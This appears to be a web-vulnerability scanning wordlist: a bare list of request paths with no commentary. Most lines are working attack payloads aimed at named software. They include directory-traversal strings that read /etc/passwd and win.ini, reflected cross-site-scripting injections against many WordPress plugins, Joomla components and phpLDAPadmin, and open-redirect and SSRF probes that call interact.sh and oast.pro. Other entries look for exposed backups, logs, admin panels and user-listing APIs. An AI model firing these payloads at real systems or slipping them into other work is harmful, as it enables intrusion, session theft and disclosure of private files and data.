/api/v1/GetSrc
/api/v1/GetDevice
/unauthenticated/..%01/..%01/..%01/..%01/..%01/..%01/..%01/..%01/..%01/..%01/..%01/..%01/..%01/..%01/..%01/..%01/..%01/..%01/..%01/..%01/..%01/..%01/..%01/..%01/..%01/..%01/..%01/..%01/..%01/..%01/..%01/..%01/..%01/..%01/..%01/..%01/..%01/..%01/..%01/..%01/etc/passwd

/wp-content/plugins/import-legacy-media/getid3/demos/demo.mimeonly.php?filename=filename%27%3E%3C%2Fscript%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E
/wp-content/plugins/infusionsoft/Infusionsoft/tests/notAuto_test_ContactService_pauseCampaign.php?go=go%22%3E%3Cscript%3Ealert%28document.cookie%29%3C/script%3E&contactId=contactId%27%3E%3C%2Fscript%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E&campaignId=campaignId%22%3E%3Cscript%3Ealert%28document.cookie%29%3C/script%3E&
/wp-content/plugins/movies/getid3/demos/demo.mimeonly.php?filename=filename%27%3E%3Cscript%3Ealert%28document.cookie%29%3C/script%3E&
/wp-content/plugins/podcast-channels/getid3/demos/demo.write.php?Filename=Filename%27%3E%3C%2Fscript%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E&
/wp-content/plugins/shortcode-ninja/preview-shortcode-external.php?shortcode=shortcode%27%3E%3Cscript%3Ealert%28document.domain%29%3C/script%3e
/wp-content/plugins/swipehq-payment-gateway-woocommerce/test-plugin.php?api_url=api_url%27%3E%3Cscript%3Ealert%28document.domain%29%3C/script%3E 
/wp-content/plugins/ultimate-weather-plugin/magpierss/scripts/magpie_debug.php?url=%22%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E
/?page_id=0&&errors[fu-disallowed-mime-type][0][name]=%3C%2Fscript%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E
/bonita/portal/themeResource?theme=portal/../../../../../../../../../../../../../../../../&location=etc/passwd
/bonita/portal/themeResource?theme=portal/../../../../../../../../../../../../../../../../&location=Windows/win.ini
/phpldapadmin/
/phpldapadmin/entry_chooser.php?container=%3Cscript%3Ealert(document.domain)%3C/script%3E
/?static=1&order=asc
/?s=%3C%2Fscript%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E
/install/index.php?step=database_config&db_error=<img%20src=x%20onerror=alert(document.domain)%20/>
/wp-admin/admin-post.php?page=give-settings&stripe_publishable_key={{stripe_publishable_key}}&stripe_publishable_key_test={{stripe_publishable_key_test}}&stripe_user_id={{stripe_user_id}}&stripe_access_token={{stripe_access_token}}&stripe_access_token_test={{stripe_access_token_test}}&connected=1
/secure/QueryComponentRendererValue!Default.jspa?assignee=user:admin
/jira/secure/QueryComponentRendererValue!Default.jspa?assignee=user:admin
/AdminTools/querybuilder/logonform.jsp
/wp-admin/admin-ajax.php?action=heartbeat&admin_custom_language_toggle=1&admin_custom_language_return_url=https://interact.sh
/mods/clansphere/lang_modvalidate.php?language=language&module=module%22></script><script>alert(document.domain)</script>
/self.key
/?data[performredirect]=%22%3E%3Cscript%3Ealert(document.domain)%3C/script%3E&page=login
/?cf-api=%22%20style=position:fixed;left:0;top:0;right:0;bottom:0;%20onmouseover=alert(1)%20x
/wp-admin/admin-ajax.php?action=wpda_gall_load_image_info&start=0&limit=1&gallery_current_index=<script>alert(document.domain)</script>
/api/module?type=%3C/script%3E%3Cscript%3Ealert(document.domain)%3C/script%3E&live_edit=true&from_url=test
/Runtime/Data/ms_admin.php
/wp-json/ssa/v1/users
/wp-admin/admin-ajax.php?action=directorist_author_pagination
/wp-login.php?action=register&redirect_to=x%22%3E%3Cscript%3Ealert(document.domain)%3C/script%3E
/functions/scripts/find_full_subnets.php
/squid.svg?title=Not%20Found&text=This%20is%20not%20the%20page%20you%20are%20looking%20for!&background=%22%3E%3Cscript%3Ealert(document.domain)%3C/script%3E%3Cimg%20src=%22&small
/pmb/admin/convert/export_z3950_new.php?command=search&query=%3Cscript%3Ealert(document.domain);%3C/script%3E=or
/?rand=1679996611398&controller=authentication&SubmitCreate=1&ajax=true&email_create=a&back=xss%20onfocus%3dalert(document.domain)%20autofocus%3d%20xss&token=6c62b773f1b284ac4743871b300a0c4d
/wp-content/plugins/protect-wp-admin/readme.txt
/wp-login.php?action=lostpassword&error=invalidkey
/loganalyzer/asktheoracle.php?type=domain&query=&uid=%22%3E%3Cscript%3Ealert(document.domain)%3C/script%3E
/print.php?nm_member=<script>alert(document.location)</script>
/matchmakings/questiontmili%22%3E%3Cimg%20src%3da%20onerror%3dalert(document.domain)%3Ew71ch?number=
/find-a-matchpksyk
/index.php/gm5rj%22%3E%3Cscript%3Ealert(document.domain)%3C/script%3Ebwude?controller=pjAdmin&action=pjActionLogin&err=1
/search?filtered=1&q=test&filter[price]=100-1331
/search?filter[brandid]=vnxjb
/debuginfo.htm
/pages/exec.php?exec_module=itop-hub-connector&exec_page=launch.php&target=inform_after_setup
/webservices/rest.php?loginop=do_reset_pwd&auth_user=doesnotexist
/login/hostinfo.cgi
/login/hostinfo2.cgi
/wp-content/plugins/wccp-pro/no-js.php?referrer=https://oast.pro
/loginok.html
/commandcenter/publicLink.do
/securityRealm/signup
/jenkins/securityRealm/signup
/wp-content/plugins/qwiz-online-quizzes-and-flashcards/qwiz_admin_sample_buttons.php?theme_stylesheet=\
/wp-json/tribe/events/v1/organizers
/wp-json/tribe/events/v1/venues
/wp-content/uploads/fifu-plugin.log
/wp-content/uploads/fifu-cloud.log
/listconf?command=conf
/jobs
/good_job/jobs
/sidekiq
/home
/net/net/net.html
/amr
/dashboard
/conf
/api/v1/cluster/summary
/apps
/ui/login
/app/kibana
/app/kibana/
/login
/go/admin/pipelines/create?group=defaultGroup
/v1/health/service/consul
/api/stats
/horizon/api/stats
/dashboard/
/lightstreamer/dashboard/
/devices.php
/service/rest/v1/repositories
/api/tags
/settings
/ui/clusters/kafka-ui/brokers
/dashboard.aspx
/overview.html
/templates/config/profmanage.php
/pacts
/ui/relationships
/api/v1/data?chart=system.cpu&format=json&points=125&group=average&gtime=0&options=ms%7Cflip%7Cjsonwrap%7Cnonzero&after=-120&dimensions=iowait
/zabbix/zabbix.php?action=dashboard.list
/zenphoto/zp-core/setup/index.php
/zp/zp-core/setup/index.php
/gallery/zp-core/setup/index.php
/zp-core/setup/index.php
/cgi-bin/nobody/Search.cgi?action=scan
/cucm-uds/users
/iproperty/property-views/all-properties-with-map?filter_keyword=pihil%22onmouseover=%22alert(document.domain)%22style=%22position:absolute;width:100%;height:100%;top:0;left:0;%22f63m4&option=com_iproperty&view=allproperties&ipquicksearch=1
/?option=com_oscommerce&osMod=mshop_pl_src&manufacturers_id=7&sort=products_sort_order&page=index.php&format=xml&task=showproducts&view=med&sort=latest&sortdir=descgt5po%3Cimg%20src=a%20onerror=alert(document.domain)%3Evh217
/joomla/greenery_hub/index.php/en/hotels/reservations?location=d2tff&task=hub.search&ordering=score&direction=desc&type_id=0&show=db8ck%22onfocus=%22confirm(document.domain)%22autofocus=%22xwu0k
/speedtest?url={{interactsh-url}}
/shop.php?search=%22/%3E%3Cscript%3Ealert(document.domain)%3C/script%3E
/preview.php?controller=Load&action=index&catid=moztj%22%3E%3Cscript%3Ealert(document.domain)%3C%2fscript%3Ems3ea&down_up=a
/shop/products?category=cordless-tools&min=1026553%3balert(document.domain)%2f%2f772
/cgi-bin/loghandler.php?ajax=251&file=/mnt/old-root/etc/passwd
/index.php?page=jobs&category=1&lrw3e%22onmouseover=%22confirm(document.domain)%22style=%22position:absolute%3bwidth:100%25%3bheight:100%25%3btop:0%3bleft:0%3b%22k1n44=1
/%3Cscript%3Ealert(document.domain)%3C/script%3E
/general/calendar/arrange/get_cal_list.php?starttime=1548058874&endtime=33165447106&view=agendaDay
/wp-admin/admin-post.php
/wp-content/backups-dup-lite/tmp/
/wp-content/backups-dup-lite
/wp-admin/admin-ajax.php?page=social-metrics-tracker-export&smt_download_export_file=1
/?wptouch_switch=desktop&redirect=http://interact.sh
